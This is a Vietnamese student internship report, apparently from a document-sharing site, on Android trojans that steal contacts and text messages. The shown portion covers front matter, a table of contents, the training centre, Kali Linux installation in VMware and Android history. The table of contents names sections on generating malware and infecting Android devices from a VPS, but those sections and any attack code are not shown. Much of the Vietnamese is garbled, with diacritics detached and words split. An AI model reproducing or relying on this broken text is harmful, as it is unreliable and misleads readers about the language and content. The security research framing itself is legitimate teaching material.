View
483
Download
2
Category
Preview:
DESCRIPTION
Android Sercurity
Citation preview
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINHTRƯỜNG ĐẠI HỌC BÁCH KHOA
KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH
MẠNG QUỐC TẾ ATHENA
BÁO CÁO Đ TÀI TH C T P CNTTỀ Ự Ậ
Nghiên c u các Trojan, Malware cho phép đánhứ c p d li u nh danh sách contact, tin nh n trênắ ữ ệ ư ắ
điên tho i s d ng Android và g i ra ngoàiạ ử ụ ử
GVHD: Th y VÕ Đ TH NGầ Ỗ Ắ
SVTH: Lê Công H u ậ
MSSV: 51101058
TPHCM, ngày 28 tháng 07 năm 2014
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
LỜI CAM ĐOAN
Tôi xin cam đoan:
Nh ng n i dung trong báo cáo này là do tôi th c hi n d i sữ ộ ự ệ ướ ự
h ngướ d n tr c ti p c a th y Võ Đ Th ng.ẫ ự ế ủ ầ ỗ ắ
M i tham kh o dùng trong báo cáo này đ u đ c trích d n rõọ ả ề ượ ẫ
ràng tên tác gi , tên công trình, th i gian, đ a đi m công b .ả ờ ị ể ố
M i sao chép không h p l , vi ph m quy ch đào t o, hay gianọ ợ ệ ạ ế ạ
l n, tôi xin ch u hoàn toàn trách nhi m.ậ ị ệ
TPHCM, ngày 28 tháng 07 năm 2014
Sinh viên th c t pự ậ
Lê Công H uậ
SVTH: Lê Công H u 51101058ậ
Trang 1
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
L I C M NỜ Ả Ơ KHOA KH & KT MÁY TÍNH, ĐH BK
TPHCM
Tôi xin chân thành c m n tr ng Đ i H c Bách Khoa TPHCM và khoa ả ơ ườ ạ ọ
Khoa H c và Kỹ Thu t Máy Tính đã t o đi u ki n cho tôi hoàn thành t t đ t ọ ậ ạ ề ệ ố ợ
TTCN 2 này. Trong đ t th c t p này đã cho tôi nh ng kinh nghi m quý báu. ợ ự ậ ữ ệ
Nh ng kinh nghi m này sẽ giúp tôi hoàn thi n h n trong công vi c và môi ữ ệ ệ ơ ệ
tr ng làm vi c sau này.ườ ệ
M c dù tôi đã c g ng hoàn thành báo cáo th c t p t t nghi p này v i t tặ ố ắ ự ậ ố ệ ớ ấ
c n l c c a b n thân. Nh ng do trình đ hi u bi t và kinh nghi m th c t ả ỗ ự ủ ả ư ộ ể ế ệ ự ế
có h n nên ch c ch n không th tránh kh i nh ng thi u sót nh t đ nh. Tôi r tạ ắ ắ ể ỏ ữ ế ấ ị ấ
mong nh n đ c s đóng góp, chia s đ tôi có th làm t t h n n a.ậ ượ ự ẻ ể ể ố ơ ữ
M t l n n a tôi xin chân thành c m n.ộ ầ ữ ả ơ
TPHCM, ngày 28 tháng 07 năm 2014
Sinh viên th c t pự ậ
Lê Công H uậ
SVTH: Lê Công H u 51101058ậ
Trang 2
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
L I C M N TRUNG TÂM ATHENAỜ Ả Ơ
Tôi xin c m n giám đ c Công Ty Qu n Tr và An Ninh M ng Qu c T ả ơ ố ả ị ạ ố ế
Athena, cùng các anh ch trong công ty. Đ c bi t, tôi xin chân thành c m n ị ặ ệ ả ơ
th y Đ Võ Th ng đã nhi t tình giúp đ và h ng d n tôi trong su t th i gian ầ ỗ ắ ệ ỡ ướ ẫ ố ờ
th c t p t i công ty. Th y đã t o m i đi u ki n thu n l i, cung c p nhũng ự ậ ạ ầ ạ ọ ề ệ ậ ợ ấ
ki n th c c n thi t cũng nh đóng góp nh ng ý ki n quý báu đ hoàn thành ế ứ ầ ế ư ữ ế ể
t t bài báo cáo này.ố
M c dù tôi đã c g ng hoàn thành báo cáo th c t p t t nghi p này v i t tặ ố ắ ự ậ ố ệ ớ ấ
c n l c c a b n thân. Nh ng do trình đ hi u bi t và kinh nghi m th c t ả ỗ ự ủ ả ư ộ ể ế ệ ự ế
có h n nên ch c ch n không th tránh kh i nh ng thi u sót nh t đ nh. Tôi r tạ ắ ắ ể ỏ ữ ế ấ ị ấ
mong nh n đ c s đóng góp, chia s đ tôi có th làm t t h n n a.ậ ượ ự ẻ ể ể ố ơ ữ
M t l n n a tôi xin chân thành c m n.ộ ầ ữ ả ơ
TPHCM, ngày 28 tháng 07 năm 2014
Sinh viên th c t pự ậ
Lê Công H uậ
SVTH: Lê Công H u 51101058ậ
Trang 3
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
L I M Đ UỜ Ở Ầ
Trong nh ng năm g n đây, v n đ “An toàn và b o m t thông tin” đangữ ầ ấ ề ả ậ
ngày càng nóng. V i s phát tri n đ n chóng m t c a các n n t ng di đ ngớ ự ể ế ặ ủ ề ả ộ
nh iOS, Android, Windows Phone cùng v i nhi u dòng đi n tho i thôngư ớ ề ệ ạ
minh, v n đ b o m t thông tin chuy n d n xu h ng t PC sang mobile. N uấ ề ả ậ ể ầ ướ ừ ế
b n đang s h u m t chi c smartphone c a Apple, Google Nexus, Samsung,ạ ở ữ ộ ế ủ
Nokia, HTC, ... li u b n có dám ch c là “d c ng” c a mình không b nhi m cácệ ạ ắ ế ư ủ ị ễ
ph n m m gián đi p, nghe lén không? Vì sao l i nh v y? Vì theo báo cáo g nầ ề ệ ạ ư ậ ầ
đây c a các hãng ph n m m b o m t nh Kaspersky Lab, Norton AV, Avastủ ầ ề ả ậ ư
hay BKAV s l ng smartphone b nhi m mã đ c ngày càng tăng. Đ c bi tố ượ ị ễ ộ ặ ệ
HĐH Android là m t HĐH phát tri n khá nhanh trong nh ng năm g n đây l iộ ể ữ ầ ạ
là m t m nh đ t béo b cho các Hacker t n công. V i s nh d c tin, thi uộ ả ấ ở ấ ớ ự ẹ ạ ả ế
hi u bi t c a ng i dùng, lòng tham các các th “Free” nh free app, free wifiể ế ủ ườ ứ ư
đã vô tình ti p tay cho các Hacker xâm nh p và cài đ t mã đ c trên chínhế ậ ặ ộ
chi c đi n tho i c a b n. ế ệ ạ ủ ạ
Hôm nay mình vi t bài báo cáo v đ tài “Nghiên c u các trojan, malwareế ề ề ứ
cho phép đánh c p d li u nh danh sách contact, tin nh n trên đi n tho iắ ữ ệ ư ắ ệ ạ
Android và g i ra ngoài” đ cùng nghiên c u, tìm hi u cách th c ho t đ ng,ử ể ứ ể ứ ạ ộ
chia s thông tin cũng nh cung c p các gi i pháp đ phòng tránh. ẻ ư ấ ả ể
SVTH: Lê Công H u 51101058ậ
Trang 4
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
NH N XÉT C A KHOAẬ Ủ
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Tr ng Khoaưở
SVTH: Lê Công H u 51101058ậ
Trang 5
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
NH N XÉT C A CÔNG TY TH C T PẬ Ủ Ự Ậ
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giám đ cố
SVTH: Lê Công H u 51101058ậ
Trang 6
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
NH N XÉT C A GIÁO VIÊN H NG D NẬ Ủ ƯỚ Ẫ
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giáo viên h ng d nướ ẫ
SVTH: Lê Công H u 51101058ậ
Trang 7
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
M C L CỤ Ụ
LỜI CAM ĐOAN..................................................................................................................................1
L I C M N KHOA KH & KT MÁY TÍNH, ĐH BK TPHCMỜ Ả Ơ .............................................2
L I C M N TRUNG TÂM ATHENAỜ Ả Ơ .......................................................................................3
L I M Đ UỜ Ở Ầ ......................................................................................................................................4
NH N XÉT C A KHOAẬ Ủ ..................................................................................................................5
NH N XÉT C A CÔNG TY TH C T PẬ Ủ Ự Ậ ...................................................................................6
NH N XÉT C A GIÁO VIÊN H NG D NẬ Ủ ƯỚ Ẫ ..........................................................................7
M C L CỤ Ụ .............................................................................................................................................8
1 GI I THI U CHUNG V CÔNG TY TH C T PỚ Ệ Ề Ự Ậ ............................................9
2 N I DUNG TH C T PỘ Ự Ậ ...........................................................................................11
2.1 Làm trên localhost:..........................................................................................................11
2.1.1 Gi i thi u HĐH Kali Linux:ớ ệ ...............................................................................11
2.1.2 Cài đ t Kali Linux trên VMware:ặ ....................................................................13
2.1.3 Gi i thi u HĐH Android:ớ ệ ...................................................................................29
2.1.4 Gi i thi u v Trojan:ớ ệ ề ..........................................................................................32
2.1.5 Gi i thi u v Malware:ớ ệ ề ......................................................................................34
2.1.6 Sinh mã đ c trên Kali Linux:ộ ...........................................................................36
2.1.7 Đ a mã đ c vào thi t b Android:ư ộ ế ị ................................................................41
2.1.8 Xâm nh p SD card c a thi t b Android t Kali Linux:ậ ủ ế ị ừ .......................45
2.1.9 K t lu n:ế ậ ...................................................................................................................47
2.2 Làm trên VPS......................................................................................................................47
2.2.1 Gi i thi u v VPS:ớ ệ ề ................................................................................................47
2.2.2 Cài đ t mã đ c trên VPS:ặ ộ ...................................................................................49
2.2.3 T VPS xâm nh p vào thi t b Android:ừ ậ ế ị ....................................................56
3 K T QU Đ T Đ CẾ Ả Ạ ƯỢ ...........................................................................................60
4 K T LU N QUÁ TRÌNH TH C T PẾ Ậ Ự Ậ ...............................................................61
SVTH: Lê Công H u 51101058ậ
Trang 8
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
1 GI I THI U CHUNG V CÔNG TY TH C T PỚ Ệ Ề Ự Ậ
Cơ s 1_T i TP H Chí Minh:ở ạ ồ
- Trung Tâm Đào T o Qu n Tr M ng và An Ninh M ng Qu c T ạ ả ị ạ ạ ố ế
ATHENA. S 2 Bis Đinh Tiên Hoàng, Ph ng Đa Kao, Tp H Chí ố ườ ồ
Minh, Vi t Nam.ệ
Đi n tho i: ( 84-8 ) 3824 4041ệ ạ
Hotline: 0943 23 00 99
C s 2_T i TP H Chí Minh:ơ ở ạ ồ
- Trung Tâm Đào T o Qu n Tr M ng và An Ninh M ng Qu c T ạ ả ị ạ ạ ố ế
ATHENA 92 Nguy n Đình Chi u ,Ph ng Đa Kao,Qu n 1, Tp H ễ ể ườ ậ ồ
Chí Minh, Vi t Nam.ệ
Website: www.athena.edu.vn or www.athena.com.vn
Đi n tho i: (84-8) 2210 3801ệ ạ
Hotline: 0943 20 00 88
- Trung Tâm Đào T o Qu n Tr M ng & An Ninh M ng Qu c T ATHENAạ ả ị ạ ạ ố ế
đ c thành l p t năm 2004, là m t t ch c quy t nhi u trí th c trượ ậ ừ ộ ổ ứ ụ ề ứ ẻ
Vi t Nam đ y năng đ ng,ệ ầ ộ nhi tệ huy tế và kinh nghi mệ trong lãnh v cự
CNTT, v iớ tâm huy tế góp ph n vào công cu c thúc đ y ti n trình đ aầ ộ ẩ ế ư
công ngh thông tin là ngành kinh t mũi nh n, góp ph n phát tri nệ ế ọ ầ ể
n c nhà.ướ
- Lĩnh v c ho t đ ng:ự ạ ộ
Trung tâm ATHENA đã và đang t p trung ch y u vào đào t o chuyênậ ủ ế ạ
sâu qu nả trị m ng,ạ an ninh m ng,ạ th ngươ m iạ đi nệ tử theo các tiêu
chu nẩ qu cố tế c a các hãng n i ti ng nh Microsoft, Cisco, Oracle,ủ ổ ế ư
Linux LPI, CEH... Song song đó, trung tâm ATHENA còn có nh ngữ
ch ng trình đào t o cao c p dành riêng ươ ạ ấ theo đ n đ t hàng c a cácơ ặ ủ
đ n v nh B Qu c Phòng, B Công An, ngân hàng, doanh nghi p, cácơ ị ư ộ ố ộ ệ
SVTH: Lê Công H u 51101058ậ
Trang 9
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
c quan chính ph , t ch c tài chính…ơ ủ ổ ứ
Sau g n 10 năm ho t đ ng,nhi u h c viên t t nghi p trung tâmầ ạ ộ ề ọ ố ệ
ATHENA đã là chuyên gia đ mả nh nậ công tác qu nả lý hệ th ngố
m ng,ạ an ninh m ngạ cho nhi u b ngành nh C c Công Ngh Thôngề ộ ư ụ ệ
Tin - B Qu c Phòng , B Công An, S Thông Tin Truy n Thông cácộ ố ộ ở ề
t nh, b u đi n các t nh,…ỉ ư ệ ỉ
Ngoài ch ng trình đào t o, Trung tâm ATHENA còn có nhi u ch ngươ ạ ề ươ
trình h p tác và trao đ i công ngh v i nhi u đ i h c l n nh đ i h cợ ổ ệ ớ ề ạ ọ ớ ư ạ ọ
Bách Khoa Thành Ph H Chí Minh, H c Vi n An Ninh Nhân Dân( Thố ồ ọ ệ ủ
Đ c), H c Vi n B u Chính Vi n Thông, Hi p h i an toàn thông tinứ ọ ệ ư ễ ệ ộ
(VNISA), Vi n Kỹ Thu t Quân S …ệ ậ ự
- Đ i ngũ gi ng viên:ộ ả
T tấ c các gi ng viên trung tâm ATHENA có đ u t t nghi p t cácả ả ề ố ệ ừ
tr ng đ i h c hàng đ u trong n c.... T t c ườ ạ ọ ầ ướ ấ ả gi ng viên ATHENA đ uả ề
ph i có các ch ng ch qu c t nh MCSA, MCSE, CCNA, CCNP,ả ứ ỉ ố ế ư
Security+, CEH,có b ng s ph m Qu c t (Microsoft Certified Trainer).ằ ư ạ ố ế
Đây là các ch ng ch chuyên môn b t bu c đ đ đi u ki n tham giaứ ỉ ắ ộ ể ủ ề ệ
gi ng d y t i trung tâm ATHENA.ả ạ ạ
Bên c nh đó, các gi ng viên ATHENA th ng đi tu nghi p và c p nh tạ ả ườ ệ ậ ậ
ki n th c công ngh m i t các n c tiên ti n nh Mỹ , Pháp, Hà Lan,ế ứ ệ ớ ừ ướ ế ư
Singapore,... và truy n đ t các công ngh m i này trong các ch ngề ạ ệ ớ ươ
trình đào t o t i trung tâm ATHENA.ạ ạ
SVTH: Lê Công H u 51101058ậ
Trang 10
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
2 N I DUNG TH C T PỘ Ự Ậ
2.1 Làm trên localhost:
2.1.1 Gi i thi u HĐH Kali Linux:ớ ệ
Kali Linux là m t h đi u hành đ c xây d ng trên nhân Linux, đ cộ ệ ề ượ ự ượ
thi t k đ ki m tra b o m t, th nghi m xâm nh p các h th ng máy tính.ế ế ể ể ả ậ ử ệ ậ ệ ố
Ti n thân c a Kali Linux là BackTrack, xu t hi n năm 2006 và đ c cácề ủ ấ ệ ượ
chuyên gia đánh giá b o m t a chu ng s d ng. Sau 7 năm liên t c phátả ậ ư ộ ử ụ ụ
tri n, tháng 3 năm 2013, hãng Offensive Security đã công b phiên b n m iể ố ả ớ
c a BackTrack có tên là Kali Linux (đ c xem nh phiên b n BackTrack 6).ủ ượ ư ả
Kali Linux t p h p và phân lo i g n nh t t c các công c thi t y u mà b t kìậ ợ ạ ầ ư ấ ả ụ ế ế ấ
chuyên gia đánh giá b o m t nào cũng c n s d ng khi tác nghi p.ả ậ ầ ử ụ ệ
Nói v u đi m c a Kali là nói v nh ng thay đ i gi a BackTrack và Kali.ề ư ể ủ ề ữ ổ ữ
So v i BackTrack, Kali có r t nhi u c i ti n:ớ ấ ề ả ế
Kali phát tri n trên n n t ng h đi u hành Debianể ề ả ệ ề
Đi u này có nghĩa Kali có r t nhi u u đi m. Đ u tiên là các Repositoryề ấ ề ư ể ầ
(Kho l u tr ph n m m) đ c đ ng b hóa v i các Repository c a Debianư ữ ầ ề ượ ồ ộ ớ ủ
SVTH: Lê Công H u 51101058ậ
Trang 11
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
nên có th d dàng có đ c các b n c p nh t vá l i b o m t m i nh t và cácể ễ ượ ả ậ ậ ỗ ả ậ ớ ấ
c p nh t Repository. Duy trì c p nh t (up-to-date) đ i v i các công cậ ậ ậ ậ ố ớ ụ
Penetration Test là m t yêu c u vô cùng quan tr ng.ộ ầ ọ
M t l i th khác là m i công c trong Kali đ u tuân theo chính sách qu nộ ợ ế ọ ụ ề ả
lý gói c a Debian. Đi u này có v không quan tr ng nh ng nó đ m b o rõủ ề ẻ ọ ư ả ả
ràng v m t c u trúc h th ng t ng th , nó cũng giúp cho chúng ta có th dề ặ ấ ệ ố ổ ể ể ễ
dàng h n trong vi c xem xét ho c thay đ i mã ngu n c a các công c .ơ ệ ặ ổ ồ ủ ụ
Tính t ng thích ki n trúcươ ế
M t u đi m quan tr ng trong Kali là nó đã c i ti n kh năng t ng thíchộ ư ể ọ ả ế ả ươ
v i ki n trúc ARM. T khi Kali xu t hi n, nhi u phiên b n n t ng đã đ cớ ế ừ ấ ệ ề ả ấ ượ ượ
t o ra. Gi đây ta có th build Kali trên m t Raspberry Pi ho c trên Samsungạ ờ ể ộ ặ
Galaxy Note.
H tr m ng không dây t t h nỗ ợ ạ ố ơ
M t trong nh ng v n đ đ c các nhà phát tri n Kali chú tr ng nhi uộ ữ ấ ề ượ ể ọ ề
nh t, chính là s h tr cho m t s l ng l n ph n c ng bên trong các thi tấ ự ỗ ợ ộ ố ượ ớ ầ ứ ế
b m ng không dây hay USB Dongles. M t yêu c u quan tr ng khi các chuyênị ạ ộ ầ ọ
gia b o m t th c hi n đánh giá m ng không dây.ả ậ ự ệ ạ
Kh năng tùy bi n caoả ế
Kali r t linh ho t khi đ c p đ n giao di n ho c kh năng tuỳ bi n hấ ạ ề ậ ế ệ ặ ả ế ệ
th ng. Đ i v i giao di n, gi đây ng i dùng đã có th ch n cho mình nhi uố ố ớ ệ ờ ườ ể ọ ề
lo i Desktops nh GNOME, KDE ho c XFCE tùy theo s thích và thói quen sạ ư ặ ở ử
d ng.ụ
D dàng nâng c p gi a các phiên b n Kali trong t ng laiễ ấ ữ ả ươ
Đ i v i b t c ai s d ng Kali, đây là m t tính năng quan tr ng khi b oố ớ ấ ứ ử ụ ộ ọ ả
trì h đi u hành Kali. V i BackTrack, b t kỳ lúc nào khi phiên b n m i đ cệ ề ớ ấ ả ớ ượ
công b thì chúng ta đ u ph i cài l i m i hoàn toàn (Ngo i tr phiên b n R2ố ề ả ạ ớ ạ ừ ả
lên R3 năm ngoái).
Gi đây v i Kali, nh vào s chuy n đ i sang n n t ng h đi u hành ờ ớ ờ ự ể ổ ề ả ệ ềDebian, Kali đã d dàng h n trong vi c âng c p h th ng khi phiên b n m i ễ ơ ệ ấ ệ ố ả ớxu t hi n, ng i dùng không ph i cài l i m i hoàn toàn n aấ ệ ườ ả ạ ớ ữ
SVTH: Lê Công H u 51101058ậ
Trang 12
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
2.1.2 Cài đ t Kali Linux trên VMware:ặ
Tr c tiên c n t i v file ISO phiên b n m i nh t c a Kali Linuxướ ầ ả ề ả ớ ấ ủ
trên link d i, bài này ta sẽ ti n hành cài phiên b n ướ ế ả Kali Linux 1.0.8 64
bit. http://www.kali.org/downloads/
Hình 2.1.1 Download HĐH Kali Linux
N u h c Công ngh thông tin thì ch c ch n b n sẽ bi t đ n ph nế ọ ệ ắ ắ ạ ế ế ầ
m m có tên là VMware. VMware Workstation là m t ph n m m t oề ộ ầ ề ạ
máy o hàng đ u. B n có th dùng VMware đ t o 1 máy tính o ch yả ầ ạ ể ể ạ ả ạ
Windows, Linux, Mac OS hay th m chí là Android n a. VMwareậ ữ
Workstation 10 là m t ph n m m gi l p h đi u hành đ bàn r t n iộ ầ ề ả ậ ệ ề ể ấ ổ
ti ng c a hãng VMware Inc. V i h n 50 tính năng m i, có th thay đ iế ủ ớ ơ ớ ể ổ
đáng k cách th c làm vi c v i các máy o.ể ứ ệ ớ ả
T giao di n chính c a VMware thì nh n vào File -> New Vitualừ ệ ủ ấ
Machine (ho c dùng phím t t Ctrl + N).ặ ắ
SVTH: Lê Công H u 51101058ậ
Trang 13
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ch n Typical và nh n Next. Đây là nh ng cài đ t mà VMwareọ ấ ữ ặ
khuyên dùng n u mu n t thi t l p nh ng tùy ch n thì nh n vàoế ố ự ế ậ ữ ọ ấ
Custom. N u không rành thì t t nh t c ch n Typical đ phi n sau này.ế ố ấ ứ ọ ỡ ề
đây mình ch n Custom và nh n next.Ở ọ ấ
Hình 2.1.2 New Virtual Machine Wizard (Step 1)
SVTH: Lê Công H u 51101058ậ
Trang 14
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Tick vào Installer Disc image file. Và ch n đ n file ISO c n cài đ tọ ế ầ ặ VMware sẽ t nh n di n đó là file iso c a h đi u hành nào.ự ậ ệ ủ ệ ề
Hình 2.1.3 New Virtual Machine Wizard (Step 2)
SVTH: Lê Công H u 51101058ậ
Trang 15
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Sau đó sẽ ch n tên máy o và n i l u tr d li u c a nóọ ả ơ ư ữ ữ ệ ủ
Hình 2.1.4 New Virtual Machine Wizard (Step 3)
SVTH: Lê Công H u 51101058ậ
Trang 16
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
nh ng b c sau thì c nh n Next. Đ n đây thì có m t tùy ch n làỞ ữ ướ ứ ấ ế ộ ọ “Customize Hardware...” Cái này đ thay đ i các thông s nh dungể ổ ố ư l ng RAM, c ng, USB Controler… Cũng tùy vào h đi u hành đangượ Ổ ứ ệ ề cài mà ch n dung l ng cho phù h p. VMware cũng đã ch n cho mình 1ọ ượ ợ ọ dung l ng phù h p r i.ượ ợ ồ
Hình 2.1.5 New Virtual Machine Wizard (Step 4)
Sau khi hoàn thành các b c này thì máy o sẽ t đ ng b t và sẽướ ả ự ộ ậ ti n hành cài đ t m t cách t đ ng. Tùy vào dung l ng mà quá trình sẽế ặ ộ ự ộ ượ di n ra nhanh hay ch m thông th ng thì m t vài ch c phút cho đ nễ ậ ườ ấ ụ ế vài ti ng. Tuy nhiên v i nh ng file ISO không h tr nh n di n t đ ngế ớ ữ ỗ ợ ậ ệ ự ộ thì b n v n sẽ ph i cài b ng tay t ng b c nh cài win bình th ngạ ẫ ả ằ ừ ướ ư ườ (đi u này cũng không khó khăn l m đúng không?)ề ắ
SVTH: Lê Công H u 51101058ậ
Trang 17
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
B n sẽ nhìn th y màn hình kh i đ ng c a Kali. Ch n m t trong haiạ ấ ở ộ ủ ọ ộ ch đ cài đ t làế ộ ặ Graphical ho cặ Text-Mode. Trong bài vi t này tôi sẽế ch n Graphical Installọ
Hình 2.1.6 Graphical Install
SVTH: Lê Công H u 51101058ậ
Trang 18
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ch n ngôn ng , v trí đ t n c c a b n sau đó click Continueọ ữ ị ấ ướ ủ ạ
Hình 2.1.7 Select a language
Hình 2.1.8 Select your location
SVTH: Lê Công H u 51101058ậ
Trang 19
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
B n cũng sẽ đ c yêu c u đ c u hình bàn phím v i bàn phím b nạ ượ ầ ể ấ ớ ạ đang s d ngử ụ
Hình 2.1.9 Configure the keyboard
SVTH: Lê Công H u 51101058ậ
Trang 20
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
B n sẽ c n ph i c u hìnhạ ầ ả ấ Network và Password cho tài kho nả Root
Hình 2.1.10 Configure the network
Hình 2.1.11 Set up user and password
SVTH: Lê Công H u 51101058ậ
Trang 21
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ti p đ n b n sẽ l a ch n đĩa b n sẽ cài đ t Kali.ế ế ạ ự ọ ổ ạ ặ
Hình 2.1.12 Partition disks (Step 1)
Hình 2.1.13 Partition disks (Step 2)
SVTH: Lê Công H u 51101058ậ
Trang 22
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Hình 2.1.14 Partition disks (Step 3)
Hình 2.1.15 Partition disks (Step 4)
SVTH: Lê Công H u 51101058ậ
Trang 23
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Hình 2.1.16 Partition disks (Step 5)
Hình 2.1.17 Partition disks (Step 6)
SVTH: Lê Công H u 51101058ậ
Trang 24
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Sau khi c u hình Partition xong, nh n Continue đ quá trình cài đ tấ ấ ể ặ b t đ u.ắ ầ
Hình 2.1.18 Install the system
SVTH: Lê Công H u 51101058ậ
Trang 25
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
C u hình Mirror. Kali s d ng m t kho l u tr trung tâm đ phânấ ử ụ ộ ư ữ ể ph i các ng d ng. B n sẽ c n ph i nh p thông tin proxy thích h p khiố ứ ụ ạ ầ ả ậ ợ c n thi t.ầ ế Chú ý: N u b n ch n “No” trong màn hình này, b n sẽ khôngế ạ ọ ạ th cài đ t các gói t kho l u tr c a Kali.ể ặ ừ ư ữ ủ
Hình 2.1.19 Configure the package manager
SVTH: Lê Công H u 51101058ậ
Trang 26
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ti p đ n là cài đ tế ế ặ GRUB
Hình 2.1.20 Install the GRUB boot loader on the hard disk
Cu i cùng, nh p vàoố ấ Continue đ kh i đ ng l i Kali.ể ở ộ ạ
Hình 2.1.21 Finish the installation
SVTH: Lê Công H u 51101058ậ
Trang 27
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Màn hình đăng nh p và sau khi b n đăng nh p vào Kali.ậ ạ ậ
Hình 2.1.22 Kali Linux login
SVTH: Lê Công H u 51101058ậ
Trang 28
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Giao di n sau khi cài đ t xong:ệ ặ
Hình 2.1.23 Kali Linux OS
2.1.3 Gi i thi u HĐH Android:ớ ệ
SVTH: Lê Công H u 51101058ậ
Trang 29
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
L ch sị ử
T ng công ty Android (Android, Inc.) đ c thành l p t i Palo Alto, Californiaổ ượ ậ ạ vào tháng 10 năm 2003 b i Andy Rubin (đ ng sáng l p công ty Danger), Richở ồ ậ Miner (đ ng sáng l p T ng công ty Vi n thông Wildfire), Nick Sears (t ng là Phóồ ậ ổ ễ ừ giám đ c T-Mobile), và Chris White (tr ng thi t k và giao di n t i WebTV) đố ưở ế ế ệ ạ ể phát tri n, theo l i c a Rubin, "các thi t b di đ ng thông minh h n có th bi tể ờ ủ ế ị ộ ơ ể ế đ c v trí và s thích c a ng i dùng". Dù nh ng ng i thành l p và nhân viênượ ị ở ủ ườ ữ ườ ậ đ u là nh ng ng i có ti ng tăm, T ng công ty Android ho t đ ng m t cách âmề ữ ườ ế ổ ạ ộ ộ th m, ch ti t l r ng h đang làm ph n m m dành cho đi n tho i di đ ng. Trongầ ỉ ế ộ ằ ọ ầ ề ệ ạ ộ năm đó, Rubin h t kinh phí. Steve Perlman, m t ng i b n thân c a Rubin, mangế ộ ườ ạ ủ cho ông 10.000 USD ti n m t nh ng t ch i tham gia vào công ty.ề ặ ư ừ ố
Google mua l i T ng công ty Android vào ngày 17 tháng 8 năm 2005, bi nạ ổ ế nó thành m t b ph n tr c thu c Google. Nh ng nhân viên c a ch ch t c aộ ộ ậ ự ộ ữ ủ ủ ố ủ T ng công ty Android, g m Rubin, Miner và White, v n ti p t c l i công ty làmổ ồ ẫ ế ụ ở ạ vi c sau th ng v này. Vào th i đi m đó không có nhi u thông tin v T ng côngệ ươ ụ ờ ể ề ề ổ ty, nh ng nhi u ng i đ n đoán r ng Google d tính tham gia th tr ng đi nư ề ườ ồ ằ ự ị ườ ệ tho i di đ ng sau b c đi này. T i Google, nhóm do Rubin đ ng đ u đã phát tri nạ ộ ướ ạ ứ ầ ể m t n n t ng thi t b di đ ng phát tri n trên n n nhân Linux. Google qu ng báộ ề ả ế ị ộ ể ề ả n n t ng này cho các nhà s n xu t đi n tho i và các nhà m ng v i l i h a sẽ cungề ả ả ấ ệ ạ ạ ớ ờ ứ c p m t h th ng uy n chuy n và có kh năng nâng c p. Google đã liên h v iấ ộ ệ ố ể ể ả ấ ệ ớ hàng lo t hãng ph n c ng cũng nh đ i tác ph n m m, b n tin cho các nhà m ngạ ầ ứ ư ố ầ ề ắ ạ r ng h s n sàng h p tác v i các c p đ khác nhau.ằ ọ ẵ ợ ớ ấ ộ
